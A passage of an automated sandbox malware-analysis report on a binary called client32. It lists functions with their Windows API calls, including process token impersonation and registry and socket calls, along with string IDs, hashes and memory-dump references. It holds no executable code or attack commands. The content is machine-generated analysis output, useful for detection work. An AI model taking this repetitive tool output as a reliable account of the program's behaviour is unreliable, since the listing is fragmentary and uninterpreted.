                                                                                                                              • DeleteObject.GDI32(00000000), ref: 1101F32D
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 1101F33B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast_memset
                                                                                                                              • String ID: $0$UndoOwnerDraw
                                                                                                                              • API String ID: 4094458939-790594647
                                                                                                                              • Opcode ID: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                                                              • Instruction ID: 9f4c9540ed3e85911a06978235dbefa5e19a2329fc37d196683f21109e2371eb
                                                                                                                              • Opcode Fuzzy Hash: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                                                              • Instruction Fuzzy Hash: 16119671E162299BDB04DFE49C85B9DFBECBB18318F000069E814D7244E674A5108B91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110042C0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 11001F80: FindWindowA.USER32 ref: 11001FA9
                                                                                                                                • Part of subcall function 11001F80: GetWindowThreadProcessId.USER32(00000000,?), ref: 11001FB7
                                                                                                                                • Part of subcall function 11001F80: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11001FCB
                                                                                                                                • Part of subcall function 11001F80: GetVersionExA.KERNEL32(?), ref: 11001FE4
                                                                                                                                • Part of subcall function 11001F80: OpenProcessToken.ADVAPI32(00000000,0002000B,00000000), ref: 11002000
                                                                                                                                • Part of subcall function 11001F80: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 11002011
                                                                                                                                • Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 11002028
                                                                                                                                • Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 1100202F
                                                                                                                              • _memset.LIBCMT ref: 11004313
                                                                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 110043C6
                                                                                                                              • GetSaveFileNameA.COMDLG32(00000058), ref: 110043CF
                                                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 11004453
                                                                                                                              • RevertToSelf.ADVAPI32 ref: 11004455
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Process$CloseEnableFileFolderHandleNameOpenPath$FindImpersonateLoggedModuleRevertSaveSelfThreadTokenUserVersion_memset
                                                                                                                              • String ID: BMP$X$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 3949878547-2539113696
                                                                                                                              • Opcode ID: 48da74a7928ca4822a4385de0e35a74d1a49f96b10f86b19444b1993e94a909d
                                                                                                                              • Instruction ID: 1a06fff4f71d161ae854b0cf7e53d0be396d8369705791c075994b803ddd0564
                                                                                                                              • Opcode Fuzzy Hash: 48da74a7928ca4822a4385de0e35a74d1a49f96b10f86b19444b1993e94a909d
                                                                                                                              • Instruction Fuzzy Hash: E441B3B4E003199BEB21DF60CC41FDAB7F4EB08748F0145A9E519AB280DBB5AA44CF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11023470 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetWindowTextLengthA.USER32(?), ref: 11023491
                                                                                                                              • GetDlgItem.USER32 ref: 110234D4
                                                                                                                              • ShowWindow.USER32(00000000), ref: 110234D7
                                                                                                                              • GetDlgItem.USER32 ref: 11023521
                                                                                                                              • ShowWindow.USER32(00000000), ref: 11023524
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              • GetDlgItem.USER32 ref: 1102356B
                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 11023577
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Item$Show$EnableErrorExitLastLengthMessageProcessTextwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                              • API String ID: 3823882759-1986719024
                                                                                                                              • Opcode ID: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
                                                                                                                              • Instruction ID: 3a296536204feeda3cf5b5ace87cff4b3db999d64eabd005e2355b496405e70e
                                                                                                                              • Opcode Fuzzy Hash: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
                                                                                                                              • Instruction Fuzzy Hash: ED214875E04329BFD724CE61CC8AF9EB3A8EB4871CF40C439F62A5A580E674E540CB51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11028450 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 83synchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,775EC740), ref: 11145CA0
                                                                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                                                              • _memset.LIBCMT ref: 11028485
                                                                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                              • wsprintfA.USER32 ref: 110284BA
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 110284FF
                                                                                                                              • GetExitCodeProcess.KERNEL32 ref: 11028513
                                                                                                                              • CloseHandle.KERNEL32(?,?), ref: 11028545
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 1102854E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseFolderHandlePath_memset$CodeExitFileModuleNameObjectOpenProcessSingleVersionWait_strncpywsprintf
                                                                                                                              • String ID: %sIsMetro.exe$D$metro=%d
                                                                                                                              • API String ID: 3392034305-515928727
                                                                                                                              • Opcode ID: 26f18ffd8f982b8077e350d85f181193653178b5fb6154d62ed9878bd0b9a749
                                                                                                                              • Instruction ID: 4035e3a62bf36e169ef3c879669cea6ce37e88d9ef90ad3d85adb6442f5f9602
                                                                                                                              • Opcode Fuzzy Hash: 26f18ffd8f982b8077e350d85f181193653178b5fb6154d62ed9878bd0b9a749
                                                                                                                              • Instruction Fuzzy Hash: 3D215375A4022CABDB14DBA4CC85FEBB778EF85704F4045D8E518A7644DAB1AE84CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110225A0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 241COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 11022648
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 1102269C
                                                                                                                              • _memset.LIBCMT ref: 110226BA
                                                                                                                              • wsprintfA.USER32 ref: 11022735
                                                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 11022892
                                                                                                                              • _memset.LIBCMT ref: 110228AC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: EnableWindow$_memsetwsprintf$ErrorExitLastMessageProcess
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 3466580958-2830328467
                                                                                                                              • Opcode ID: e8b9ea96a7fd78eb1c56f50796e7885e0a0a27d2dea1b0c3bb5a6de3d17255e0
                                                                                                                              • Instruction ID: 3ff64eba74673daa74ed6c9393adcbd4b9b69a292ef26d2c9ad3098e7bb1651f
                                                                                                                              • Opcode Fuzzy Hash: e8b9ea96a7fd78eb1c56f50796e7885e0a0a27d2dea1b0c3bb5a6de3d17255e0
                                                                                                                              • Instruction Fuzzy Hash: 7EA18F75A402199BEB20CF64CC84FD9B3F5BF58304F5041D9E65EAB281D7B4AA84CF91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11019350 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 11019370
                                                                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                                              • _memmove.LIBCMT ref: 110193F7
                                                                                                                              • _memmove.LIBCMT ref: 1101941B
                                                                                                                              • _memmove.LIBCMT ref: 11019455
                                                                                                                              • _memmove.LIBCMT ref: 11019471
                                                                                                                              • std::exception::exception.LIBCMT ref: 110194BB
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 110194D0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                              • String ID: deque<T> too long
                                                                                                                              • API String ID: 827257264-309773918
                                                                                                                              • Opcode ID: 92861714a325600dbbf4c8ba4c0498ff0bd86bc604758ab4b64b7cdb57f82fff
                                                                                                                              • Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
                                                                                                                              • Opcode Fuzzy Hash: 92861714a325600dbbf4c8ba4c0498ff0bd86bc604758ab4b64b7cdb57f82fff
                                                                                                                              • Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 111194B0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 153COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 11113040: GetClientRect.USER32 ref: 1111306A
                                                                                                                              • GetWindowRect.USER32 ref: 111194E1
                                                                                                                              • MapWindowPoints.USER32 ref: 111194FA
                                                                                                                              • GetClientRect.USER32 ref: 11119508
                                                                                                                              • GetScrollRange.USER32(?,00000000,?,?), ref: 11119549
                                                                                                                              • GetSystemMetrics.USER32 ref: 11119559
                                                                                                                              • GetScrollRange.USER32(?,00000001,?,00000000), ref: 1111956C
                                                                                                                              • GetSystemMetrics.USER32 ref: 11119576
                                                                                                                              Strings
                                                                                                                              • GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 111195BC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
                                                                                                                              • String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
                                                                                                                              • API String ID: 4172599486-2052393828
                                                                                                                              • Opcode ID: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
                                                                                                                              • Instruction ID: 912fb1d3c2cdad7c34c8054a8beb9bd8394091149dbdaf68818a53be5a6566d8
                                                                                                                              • Opcode Fuzzy Hash: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
                                                                                                                              • Instruction Fuzzy Hash: E051F8B1900609AFDB14CFA8C980BEEFBF9FF88314F104569E526A7244D774A941CF60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1113C3C0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 151windowtimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _strncpy.LIBCMT ref: 1113C41F
                                                                                                                              • IsWindow.USER32(00000000), ref: 1113C451
                                                                                                                              • _malloc.LIBCMT ref: 1113C4B0
                                                                                                                              • _memmove.LIBCMT ref: 1113C515
                                                                                                                              • SendMessageTimeoutA.USER32(00000000,0000004A,00030280,00000003,00000002,00002710,?), ref: 1113C56F
                                                                                                                              • _free.LIBCMT ref: 1113C576
                                                                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorFreeHeapLastMessageSendTimeoutWindow_free_malloc_memmove_strncpy
                                                                                                                              • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                              • API String ID: 1602665774-2270926670
                                                                                                                              • Opcode ID: f5b2c6c5781073486aca12cb7a6af53d8c92ab2d874e06493356e311be6ff0f9
                                                                                                                              • Instruction ID: a2dd537b469b56fd0a393197ec2e6fa62d94d6918f16b8d23f7c7785d4e9094b
                                                                                                                              • Opcode Fuzzy Hash: f5b2c6c5781073486aca12cb7a6af53d8c92ab2d874e06493356e311be6ff0f9
                                                                                                                              • Instruction Fuzzy Hash: 5D51C134A0120AAFDB00DF94DD81FEEF7B9EF89718F104125F915A7284E771AA04CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110D8180 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 147networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018915,30AC22AD,?,?,?,1117EE88,000000FF), ref: 110DEB61
                                                                                                                                • Part of subcall function 110E1B10: FormatMessageA.KERNEL32(00001200,00000000,30AC22AD,00000400,?,?,00000000,00000401,30AC22AD,110D862B,00000000,?), ref: 110E1B80
                                                                                                                                • Part of subcall function 11010CD0: _memmove.LIBCMT ref: 11010D0D
                                                                                                                              • shutdown.WSOCK32(?,00000002,00000000,00000000,00000000), ref: 110D81F9
                                                                                                                              • closesocket.WSOCK32(?), ref: 110D8203
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 110D8229
                                                                                                                              • _memset.LIBCMT ref: 110D827C
